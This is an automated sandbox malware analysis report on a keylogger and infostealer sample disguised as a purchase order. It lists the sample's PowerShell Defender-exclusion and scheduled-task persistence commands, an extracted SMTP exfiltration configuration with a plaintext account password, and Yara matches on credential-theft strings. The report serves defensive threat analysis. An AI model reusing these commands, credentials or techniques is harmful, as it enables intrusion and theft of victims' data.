Edit tour

Windows Analysis Report
PO#17971.exe

Overview

General Information

Sample name:	PO#17971.exe
Analysis ID:	1587573
MD5:	7a01ce7b443e4c2f5344ef3ec0e21538
SHA1:	90f517920d408f9db6cdbeb6f67ba7c62708c851
SHA256:	ee6993e7afbf9a039db981542c0250e22fcaa01434db911732851c9e52bb38b6
Tags:	exeuser-James_inthe_box
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PO#17971.exe (PID: 428 cmdline: "C:\Users\user\Desktop\PO#17971.exe" MD5: 7A01CE7B443E4C2F5344EF3EC0E21538)

powershell.exe (PID: 6548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7388 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 3160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TZRtlifudvO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2716 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 7192 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

TZRtlifudvO.exe (PID: 7252 cmdline: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe MD5: 7A01CE7B443E4C2F5344EF3EC0E21538)

schtasks.exe (PID: 7520 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BBF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

vbc.exe (PID: 7576 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

vbc.exe (PID: 7584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "account@igakuin.com", "Password": "aa209bmt", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "account@igakuin.com", "Password": "aa209bmt", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2093507552.00000000070A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3637c:$a1: get_encryptedPassword 0x36350:$a2: get_encryptedUsername 0x36414:$a3: get_timePasswordChanged 0x3632c:$a4: get_passwordField 0x36392:$a5: set_encryptedPassword 0x3615f:$a7: get_logins 0x31a75:$a10: KeyLoggerEventArgs 0x31a44:$a11: KeyLoggerEventArgsEventHandler 0x36233:$a13: _encryptedPassword
00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4010c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f7af:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa0c:$a4: \Orbitum\User Data\Default\Login Data 0x403eb:$a5: \Kometa\User Data\Default\Login Data
00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f20:$s1: UnHook 0x33ebc:$s2: SetHook 0x33ef5:$s3: CallNextHook 0x33e84:$s4: _hook
00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 EC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x771da:$a1: get_encryptedPassword 0x771ae:$a2: get_encryptedUsername 0x77272:$a3: get_timePasswordChanged 0x7718a:$a4: get_passwordField 0x771f0:$a5: set_encryptedPassword 0x76fbd:$a7: get_logins 0x728d3:$a10: KeyLoggerEventArgs 0x728a2:$a11: KeyLoggerEventArgsEventHandler 0x77091:$a13: _encryptedPassword
00000009.00000002.4513884239.00000000072C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3545c:$a1: get_encryptedPassword 0x35430:$a2: get_encryptedUsername 0x354f4:$a3: get_timePasswordChanged 0x3540c:$a4: get_passwordField 0x35472:$a5: set_encryptedPassword 0x3523f:$a7: get_logins 0x30b55:$a10: KeyLoggerEventArgs 0x30b24:$a11: KeyLoggerEventArgsEventHandler 0x35313:$a13: _encryptedPassword
00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1ec:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e88f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eaec:$a4: \Orbitum\User Data\Default\Login Data 0x3f4cb:$a5: \Kometa\User Data\Default\Login Data
00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33000:$s1: UnHook 0x32f9c:$s2: SetHook 0x32fd5:$s3: CallNextHook 0x32f64:$s4: _hook
00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.2130210299.00000000024D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2086741217.0000000002D74000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: PO#17971.exe PID: 428	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 7192	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 7192	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: vbc.exe PID: 7192	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: vbc.exe PID: 7192	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xdcc17:$a1: get_encryptedPassword 0xdcbeb:$a2: get_encryptedUsername 0xdccaf:$a3: get_timePasswordChanged 0xdcbc7:$a4: get_passwordField 0xdcc2d:$a5: set_encryptedPassword 0xdca03:$a7: get_logins 0xd9431:$a10: KeyLoggerEventArgs 0xd9400:$a11: KeyLoggerEventArgsEventHandler 0xdcace:$a13: _encryptedPassword
Process Memory Space: TZRtlifudvO.exe PID: 7252	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 7584	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 7584	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: vbc.exe PID: 7584	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: vbc.exe PID: 7584	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x106a43:$a1: get_encryptedPassword 0x1bb357:$a1: get_encryptedPassword 0x106a17:$a2: get_encryptedUsername 0x1bb32b:$a2: get_encryptedUsername 0x106adb:$a3: get_timePasswordChanged 0x1bb3ef:$a3: get_timePasswordChanged 0x1069f3:$a4: get_passwordField 0x1bb307:$a4: get_passwordField 0x106a59:$a5: set_encryptedPassword 0x1bb36d:$a5: set_encryptedPassword 0x10682f:$a7: get_logins 0x1bb143:$a7: get_logins 0x10325d:$a10: KeyLoggerEventArgs 0x1b7a5e:$a10: KeyLoggerEventArgs 0x10322c:$a11: KeyLoggerEventArgsEventHandler 0x1b7a2d:$a11: KeyLoggerEventArgsEventHandler 0x1068fa:$a13: _encryptedPassword 0x1bb20e:$a13: _encryptedPassword
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO#17971.exe.70a0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.vbc.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 EC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0.2.PO#17971.exe.2d9d95c.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.TZRtlifudvO.exe.254da24.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO#17971.exe.70a0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.TZRtlifudvO.exe.36453a0.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 EC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.vbc.exe.8d70000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.vbc.exe.8d70000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.vbc.exe.8d70000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.vbc.exe.8d70000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3385c:$a1: get_encryptedPassword 0x33830:$a2: get_encryptedUsername 0x338f4:$a3: get_timePasswordChanged 0x3380c:$a4: get_passwordField 0x33872:$a5: set_encryptedPassword 0x3363f:$a7: get_logins 0x2ef55:$a10: KeyLoggerEventArgs 0x2ef24:$a11: KeyLoggerEventArgsEventHandler 0x33713:$a13: _encryptedPassword
16.2.vbc.exe.8d70000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d5ec:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc8f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ceec:$a4: \Orbitum\User Data\Default\Login Data 0x3d8cb:$a5: \Kometa\User Data\Default\Login Data
16.2.vbc.exe.8d70000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31400:$s1: UnHook 0x3139c:$s2: SetHook 0x313d5:$s3: CallNextHook 0x31364:$s4: _hook
9.2.vbc.exe.6e9fe5e.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vbc.exe.6e9fe5e.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.vbc.exe.6e9fe5e.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.vbc.exe.6e9fe5e.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3457c:$a1: get_encryptedPassword 0x34550:$a2: get_encryptedUsername 0x34614:$a3: get_timePasswordChanged 0x3452c:$a4: get_passwordField 0x34592:$a5: set_encryptedPassword 0x3435f:$a7: get_logins 0x2fc75:$a10: KeyLoggerEventArgs 0x2fc44:$a11: KeyLoggerEventArgsEventHandler 0x34433:$a13: _encryptedPassword
9.2.vbc.exe.6e9fe5e.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e30c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d9af:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc0c:$a4: \Orbitum\User Data\Default\Login Data 0x3e5eb:$a5: \Kometa\User Data\Default\Login Data
9.2.vbc.exe.6e9fe5e.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32120:$s1: UnHook 0x320bc:$s2: SetHook 0x320f5:$s3: CallNextHook 0x32084:$s4: _hook
9.2.vbc.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 EC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.vbc.exe.6810000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.vbc.exe.6810000.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.vbc.exe.6810000.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.vbc.exe.6810000.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3457c:$a1: get_encryptedPassword 0x34550:$a2: get_encryptedUsername 0x34614:$a3: get_timePasswordChanged 0x3452c:$a4: get_passwordField 0x34592:$a5: set_encryptedPassword 0x3435f:$a7: get_logins 0x2fc75:$a10: KeyLoggerEventArgs 0x2fc44:$a11: KeyLoggerEventArgsEventHandler 0x34433:$a13: _encryptedPassword
16.2.vbc.exe.6810000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e30c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d9af:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc0c:$a4: \Orbitum\User Data\Default\Login Data 0x3e5eb:$a5: \Kometa\User Data\Default\Login Data
16.2.vbc.exe.6810000.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32120:$s1: UnHook 0x320bc:$s2: SetHook 0x320f5:$s3: CallNextHook 0x32084:$s4: _hook
0.2.PO#17971.exe.3e94d08.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 EC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.PO#17971.exe.3ce5100.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 EC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.2.TZRtlifudvO.exe.254da24.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.vbc.exe.6810f20.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.vbc.exe.6810f20.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.vbc.exe.6810f20.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.vbc.exe.6810f20.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.vbc.exe.6810f20.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3545c:$a1: get_encryptedPassword 0x35430:$a2: get_encryptedUsername 0x354f4:$a3: get_timePasswordChanged 0x3540c:$a4: get_passwordField 0x35472:$a5: set_encryptedPassword 0x3523f:$a7: get_logins 0x30b55:$a10: KeyLoggerEventArgs 0x30b24:$a11: KeyLoggerEventArgsEventHandler 0x35313:$a13: _encryptedPassword
16.2.vbc.exe.6810f20.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1ec:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e88f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eaec:$a4: \Orbitum\User Data\Default\Login Data 0x3f4cb:$a5: \Kometa\User Data\Default\Login Data
16.2.vbc.exe.6810f20.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33000:$s1: UnHook 0x32f9c:$s2: SetHook 0x32fd5:$s3: CallNextHook 0x32f64:$s4: _hook
9.2.vbc.exe.6e9fe5e.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vbc.exe.6e9fe5e.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vbc.exe.6e9fe5e.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.vbc.exe.6e9fe5e.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.vbc.exe.6e9fe5e.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3637c:$a1: get_encryptedPassword 0x36350:$a2: get_encryptedUsername 0x36414:$a3: get_timePasswordChanged 0x3632c:$a4: get_passwordField 0x36392:$a5: set_encryptedPassword 0x3615f:$a7: get_logins 0x31a75:$a10: KeyLoggerEventArgs 0x31a44:$a11: KeyLoggerEventArgsEventHandler 0x36233:$a13: _encryptedPassword
9.2.vbc.exe.6e9fe5e.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4010c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f7af:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa0c:$a4: \Orbitum\User Data\Default\Login Data 0x403eb:$a5: \Kometa\User Data\Default\Login Data
9.2.vbc.exe.6e9fe5e.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f20:$s1: UnHook 0x33ebc:$s2: SetHook 0x33ef5:$s3: CallNextHook 0x33e84:$s4: _hook
16.2.vbc.exe.6810f20.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
